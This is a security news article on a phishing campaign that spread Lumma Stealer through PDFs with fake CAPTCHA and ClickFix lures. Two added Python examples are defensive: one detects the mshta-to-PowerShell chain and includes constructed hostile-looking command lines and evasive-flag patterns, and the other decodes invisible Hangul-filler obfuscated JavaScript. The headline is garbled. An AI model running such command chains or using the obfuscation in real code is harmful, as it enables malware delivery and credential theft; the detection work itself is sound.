5,000 phishing PDFs on 260 domains distribute lumma steelers via fake capture

By user, February 28, 2025

Phishing PDF

Cybersecurity researchers have discovered a widespread phishing campaign that delivers Lumma Stealer malware using fake CAPTCHA images shared via PDF documents hosted on Webflow's Content Delivery Network (CDN).

Netskope Threat Labs said it has identified 260 unique domains hosting roughly 5,000 phishing PDF files that redirect victims to malicious websites.

"Attackers use SEO to trick victims into visiting the page by clicking on malicious search engine results," security researcher Jan Michael Alcantara said in a report shared with The Hacker News.

"Most of the phishing pages focus on stealing credit card information, but some PDF files contain fake CAPTCHAs that trick the victim into running malicious PowerShell commands, ultimately leading to the Lumma Stealer malware."

The phishing campaign is estimated to have affected more than 1,150 organizations and more than 7,000 users since the second half of 2024, with the attacks primarily targeting victims in North America, Asia and Southern Europe across the technology, financial services and manufacturing sectors.


Of the 260 domains identified as hosting the bogus PDFs, the majority are related to Webflow, followed by those related to GoDaddy, Strikingly, Wix, and Fastly.

Attackers have also been observed uploading some of their PDF files to legitimate online libraries and PDF repositories such as PDFCOFFEE, PDF4PRO, PDFBEAN, and the Internet Archive.

The PDFs contain fraudulent CAPTCHA images that act as a conduit for stealing credit card information. Alternatively, the PDFs used to distribute Lumma Stealer embed images that pose as downloadable documents and take the victim to a malicious site when clicked.

That site, for its part, poses as a CAPTCHA verification page and uses the ClickFix technique to trick the victim into running an MSHTA command, which in turn launches a PowerShell script that executes the stealer malware.
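The chain described above (a fake verification page leading to mshta.exe, which launches PowerShell) leaves a recognisable process-creation pattern. The following is an added example, not code from the article or from any vendor named in it; it assumes your endpoint telemetry exposes parent image, image and command line the way Sysmon Event ID 1 does, and runs over constructed records.

```python
# Added example: flag the mshta.exe -> powershell.exe chain typical of ClickFix
# lures, scored so that analysts can tune the threshold. Records are constructed
# for illustration; paths, URLs and command lines are not real indicators.
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Script hosts that a pasted "verification" command typically starts with.
SCRIPT_HOST_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Switches commonly paired with hands-off execution of a pasted one-liner.
EVASIVE_FLAGS = ("-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
                 "-nop", "-noprofile", "bypass")


def basename(path: str) -> str:
    """Normalise a Windows path to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def clickfix_score(ev: ProcEvent) -> int:
    """0-3: parent is a script host, child is PowerShell, evasive flags present."""
    score = 0
    if basename(ev.parent_image) in SCRIPT_HOST_PARENTS:
        score += 1
    if basename(ev.image) in POWERSHELL:
        score += 1
    if any(flag in ev.command_line.lower() for flag in EVASIVE_FLAGS):
        score += 1
    return score


def find_clickfix(events, threshold: int = 2):
    """Return events at or above the threshold (2 = script host spawning PowerShell)."""
    return [ev for ev in events if clickfix_score(ev) >= threshold]


# Constructed sample telemetry: one benign PowerShell launch, one ClickFix-like chain.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "https://example.invalid/verify"'),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -nop -enc UEFZTE9BRA=="),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1"),
]
```

In a real deployment the parent of mshta.exe is usually a browser or explorer.exe after a copy-and-paste into the Run dialog, so correlating the first record with the second adds confidence.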

Over the past few weeks, Lumma Stealer has also been disguised as Roblox games and as a cracked version of the Total Commander tool for Windows, highlighting the myriad delivery mechanisms employed by various threat actors. Users are redirected to these websites via YouTube videos that were likely uploaded from previously compromised accounts.

"Malicious links and infected files are often disguised in YouTube videos, comments, or descriptions," Silent Push said. "Exercising caution and being skeptical of unverified sources when interacting with YouTube content, especially when prompted to download or click on links, can help protect against these growing threats."

The cybersecurity company further found that Lumma Stealer logs are being shared for free on a relatively new hacking forum called Leaky[.]pro, which started operating in late December 2024.

Lumma Stealer is a fully featured crimeware solution sold under the malware-as-a-service (MaaS) model, offering a way to harvest a wide range of information from compromised Windows hosts. In early 2024, the malware operators announced an integration with a Golang-based proxy malware known as GhostSocks.

"Adding SOCKS5 backconnect functionality to existing Lumma infections, or any malware for that matter, is a huge advantage for threat actors," Infrawatch said.

By leveraging victims' internet connections, attackers can bypass geographical restrictions and IP-based integrity checks, particularly those enforced by financial institutions and other high-value targets. Combined with the credentials harvested via infostealer logs, this capability significantly improves the chances of successful unauthorized access attempts, further extending the impact of a Lumma infection after the initial compromise.


According to Zscaler ThreatLabz and eSentire, stealer malware such as Vidar and Atomic macOS Stealer (AMOS) is also being distributed using lures based on the ClickFix method.

Phishing attacks have also been found to abuse a technique first documented in October 2024: a JavaScript obfuscation method that uses invisible Unicode characters to represent binary values.

The approach uses Unicode filler characters, specifically the Halfwidth Hangul Filler (U+FFA0) and the Hangul Filler (U+3164), to represent the binary values 0 and 1 respectively, converting each ASCII character of the JavaScript payload into an invisible Hangul-filler equivalent.
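Because legitimate source code essentially never contains long runs of these two filler characters, the obfuscation is easy to detect and to reverse during triage. The following is an added example, not code from the article or from the researchers who documented the technique; it uses the mapping given above (U+FFA0 = 0, U+3164 = 1), assumes ASCII payloads, and builds its own constructed sample so it runs offline.

```python
# Added example: find and decode Hangul-filler obfuscated JavaScript.
# Mapping per the article: U+FFA0 (Halfwidth Hangul Filler) = 0, U+3164 (Hangul Filler) = 1.
import re

ZERO = "\uffa0"
ONE = "\u3164"
# A run of at least eight filler characters is at least one encoded byte.
FILLER_RUN = re.compile(f"[{ZERO}{ONE}]{{8,}}")


def decode_filler_run(run: str) -> str:
    """Turn a run of filler characters back into the ASCII it encodes."""
    bits = "".join("0" if ch == ZERO else "1" for ch in run)
    # Drop any trailing partial byte instead of failing on odd-length runs.
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


def find_hidden_payloads(script: str) -> list:
    """Return every decoded payload hidden in filler runs, in source order."""
    return [decode_filler_run(m.group(0)) for m in FILLER_RUN.finditer(script)]


def is_suspicious(script: str, min_run: int = 64) -> bool:
    """Flag a script whose longest filler run could hide at least min_run/8 bytes."""
    return any(len(m.group(0)) >= min_run for m in FILLER_RUN.finditer(script))


def encode_filler(text: str) -> str:
    """Inverse of decode_filler_run; used here only to build the constructed sample."""
    return "".join(ONE if bit == "1" else ZERO
                   for ch in text for bit in format(ord(ch), "08b"))


# Constructed sample: a harmless string hidden inside a placeholder JS wrapper.
# The wrapper is illustrative only; it is not the loader from the campaign.
HIDDEN = "alert('decoded')"
SAMPLE_JS = 'var s = "' + encode_filler(HIDDEN) + '";\nconsole.log(s.length);\n'

if __name__ == "__main__":
    print("suspicious:", is_suspicious(SAMPLE_JS))
    for payload in find_hidden_payloads(SAMPLE_JS):
        print("hidden payload:", payload)
```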

"The attacks, which include private information, are highly personalized, and the initial JavaScript attempts to abort the attack if it is being analyzed by calling a debugger breakpoint, detecting the resulting delay, and then redirecting to a benign website."
